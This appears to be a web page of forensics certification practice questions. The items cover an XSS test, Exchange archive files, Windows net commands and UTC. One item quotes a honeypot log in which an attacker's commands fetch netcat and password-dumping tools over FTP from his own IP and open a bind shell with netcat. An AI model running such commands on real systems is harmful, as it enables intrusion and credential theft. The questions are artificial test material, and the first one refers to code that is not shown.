You are carrying out the last round of testing for your new website before it goes live. The website has many dynamic pages and connects to a SQL backend that accesses your product inventory in a database. You come across a web security site that recommends inputting the following code into a search field on web pages to check for vulnerabilities: When you type this and click on search, you receive a pop-up window that says: "This is a test." What is the result of this test?

• A.Your website is not vulnerable
• B.Your website is vulnerable to web bugs
• C.Your website is vulnerable to SQL injection
• D.Your website is vulnerable to CSS

Comment: *

Name: *

Email: *

Verification: *

After suspecting a change in MS-Exchange Server storage archive, the investigator has analyzed it. Which of the following components is not an actual part of the archive?

• A.PUB.STM
• B.PRIV.STM
• C.PRIV.EDB
• D.PUB.EDB

Comment: *

Name: *

Email: *

Verification: *

Which of the following commands shows you all of the network services running on Windowsbased servers?

• A.Net config
• B.Net start
• C.Net use
• D.Net Session

Comment: *

Name: *

Email: *

Verification: *

The following excerpt is taken from a honeypot log that was hosted at lab.wiretrip.net. Snort reported Unicode attacks from 213.116.251.162. The File Permission Canonicalization vulnerability (UNICODE attack) allows scripts to be run in arbitrary folders that do not normally have the right to run scripts. The attacker tries a Unicode attack and eventually succeeds in displaying boot.ini.
He then switches to playing with RDS, via msadcs.dll. The RDS vulnerability allows a malicious user to construct SQL statements that will execute shell commands (such as CMD.EXE) on the IIS server. He does a quick query to discover that the directory exists, and a query to msadcs.dll shows that it is functioning correctly. The attacker makes a RDS query which results in the commands run as shown below.
"cmd1.exe /c open 213.116.251.162 >ftpcom"
"cmd1.exe /c echo johna2k >>ftpcom"
"cmd1.exe /c echo haxedj00 >>ftpcom"
"cmd1.exe /c echo get nc.exe >>ftpcom"
"cmd1.exe /c echo get pdump.exe >>ftpcom"
"cmd1.exe /c echo get samdump.dll >>ftpcom"
"cmd1.exe /c echo quit >>ftpcom"
"cmd1.exe /c ftp -s:ftpcom"
"cmd1.exe /c nc -l -p 6969 -e cmd1.exe"
What can you infer from the exploit given?

• A.It is a local exploit where the attacker logs in using username johna2k
• B.There are two attackers on the system - johna2k and haxedj00
• C.The attack is a remote exploit and the hacker downloads three files
• D.The attacker is unsuccessful in spawning a shell as he has specified a high end UDP port

Comment: *

Name: *

Email: *

Verification: *

During forensics investigations, investigators tend to collect the system time at first and compare it with UTC. What does the abbreviation UTC stand for?

• A.Universal Computer Time
• B.Coordinated Universal Time
• C.Correlated Universal Time
• D.Universal Time for Computers

Comment: *

Name: *

Email: *

Verification: *